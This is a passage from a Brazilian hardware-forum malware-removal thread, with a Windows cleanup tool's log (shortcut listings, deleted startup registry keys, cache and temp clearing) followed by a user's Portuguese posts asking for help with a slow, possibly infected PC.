Auto IV\LaunchGTAIV.exe -safemode C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rockstar Games\Grand Theft Auto IV\Grand Theft Auto IV.lnk - C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rockstar Games\Grand Theft Auto IV\Revoke License.lnk - C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe /revoke C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TERA\En Masse Diagnostic Tool.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\EMEDiag.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TERA\TERA-Launcher.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\TERA-Launcher.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Tibia Website.lnk - C:\Program Files (x86)\Tibia\Tibia.url C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Tibia.lnk - C:\Program Files (x86)\Tibia\Tibia.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Uninstall Tibia.lnk - C:\Program Files (x86)\Tibia\unins000.exe ==== shortcuts in Quick Launch ====================== C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk - C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk - C:\Users\Default User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk - C:\Users\Default User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk - C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Free Mp3 Wma Converter.lnk - C:\Program Files (x86)\Free mp3 Wma Converter\FreeConverter\FreeConverter.exe C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk - C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk - C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Tibia.lnk - C:\Program Files (x86)\Tibia10.80\Tibia.exe C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk - C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\µTorrent.lnk - C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\ħÊÞÕù°Ô¹Ù·½¶Ôսƽ̨.lnk - C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7e4dca80246863e3\pinned.lnk - C:\WINDOWS\system32\control.exe C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9d78513a8998829c\pinned.lnk - C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9d91276b0be3e46b\pinned.lnk - C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\CCleaner.lnk - C:\Program Files (x86)\CCleaner\CCleaner64.exe C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Tibia.lnk - C:\Program Files (x86)\Tibia\Tibia.exe C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Warcraft 3 1.22a-1.25b+ loader for PvPGN.lnk - C:\Program Files (x86)\Warcraft III Reign of Chaos & The Frozen Throne\w3l.exe C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk - C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk - C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Launch TERA.exe.lnk - C:\Users\Public\Games\En Masse Entertainment\TERA\Client\Binaries\TERA.exe C:\Users\Luiz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\µTorrent.lnk - C:\Users\USURIO~1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk - C:\Users\USURIO~1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk - ==== Reset IE Proxy ====================== Value(s) before fix: "ProxyEnable"=dword:00000000 Value(s) after fix: "ProxyEnable"=dword:00000000 ==== Deleting Registry Keys ====================== HKEY_LOCAL_MACHINE\Software\wow6432node\Policies\Google deleted successfully HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\bbd32.exe deleted successfully HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DAEMON Tools Lite deleted successfully HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DFX deleted successfully HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google Update deleted successfully HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Keyboard Inf. deleted successfully HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\LJW Start deleted successfully HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\OiVelox deleted successfully ==== Empty IE Cache ====================== C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully C:\Users\Administrador\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully C:\Users\Luiz\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully C:\Users\Luiz\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 emptied successfully C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully C:\WINDOWS\serviceprofiles\Localservice\AppData\Local\Temp\Temporary Internet Files\Content.IE5 emptied successfully C:\Users\Administrador\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully C:\Users\Luiz\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully C:\Users\Luiz\AppData\Local\Microsoft\Windows\INetCache\Low\IE emptied successfully C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully ==== Empty FireFox Cache ====================== C:\Users\Luiz\AppData\Local\Mozilla\Firefox\Profiles\9i2ju27x.default\cache2 will be emptied at reboot ==== Empty Chrome Cache ====================== C:\Users\Luiz\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully ==== Empty All Flash Cache ====================== No Flash Cache Found ==== Empty All Java Cache ====================== Java Cache cleared successfully ==== Reset WMI ====================== Os seguintes servi‡os sÆo dependentes do servi‡o de Testador de instrumenta‡Æo de gerenciam. do Windows. Finalizar o servi‡o Testador de instrumenta‡Æo de gerenciam. do Windows tamb‚m finalizar estes servi‡os. Central de Seguran‡a Auxiliar de IP O servi‡o de Central de Seguran‡a est sendo finalizado . O servi‡o de Central de Seguran‡a foi finalizado com ˆxito. O servi‡o de Auxiliar de IP est sendo finalizado . O servi‡o de Auxiliar de IP foi finalizado com ˆxito. O servi‡o de Testador de instrumenta‡Æo de gerenciam. do Windows est sendo finalizado . O servi‡o de Testador de instrumenta‡Æo de gerenciam. do Windows foi finalizado com ˆxito. C:\WINDOWS\system32\wbem\repository renamed to repository.old C:\WINDOWS\syswow64\wbem\repository renamed to repository.old ==== Empty Temp Folders ====================== C:\WINDOWS\Temp will be emptied at reboot ==== After Reboot ====================== ==== Empty Temp Folders ====================== C:\WINDOWS\Temp successfully emptied C:\Users\Luiz\AppData\Local\Temp successfully emptied ==== Empty Recycle Bin ====================== C:\$RECYCLE.BIN successfully emptied ==== EOF on 29/07/2016 at 10:06:06,86 ======================
  7. Ola Carlos Turco, muito obrigado por querer me ajudar !! Reli as instruçoes e acredito que meu erro foi o fato de eu ter executado o scan pela pasta downloads ao invés do desktop e talvez pelo fato de eu nao ter desabilitado o Windows Defender. Segue novo log conforme as instruções Muito Obrigado amigo !! ZA-Scan.txt
  8. Boa tarde senhores venho aqui pedir a ajuda de vocês para remoçao de virus na minha maquina. Nehuma "açao estranha" ocorre, apenas lentidao e o uso da memoria quase sempre a 100%. Sei que o ideal seria uma formataçao, visto que ja nao o faço a quase 4 anos, porém no momento essa nao é uma opção para mim pois nao possuo em maos nenhuma unidade para backup .. Sou novo aqui, por isso antes de criar esse topico dei uma lida em todas regras , porém se alguma coisa nao esta no conforme peço desculpas , pois ninguem é perfeito ! Ficaria imensamente grato se alguem pudesse me ajudar com o seu conhecimento, desde ja muito obrigado ! Segue log do ZA-Scan ZA-Scan.txt

Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×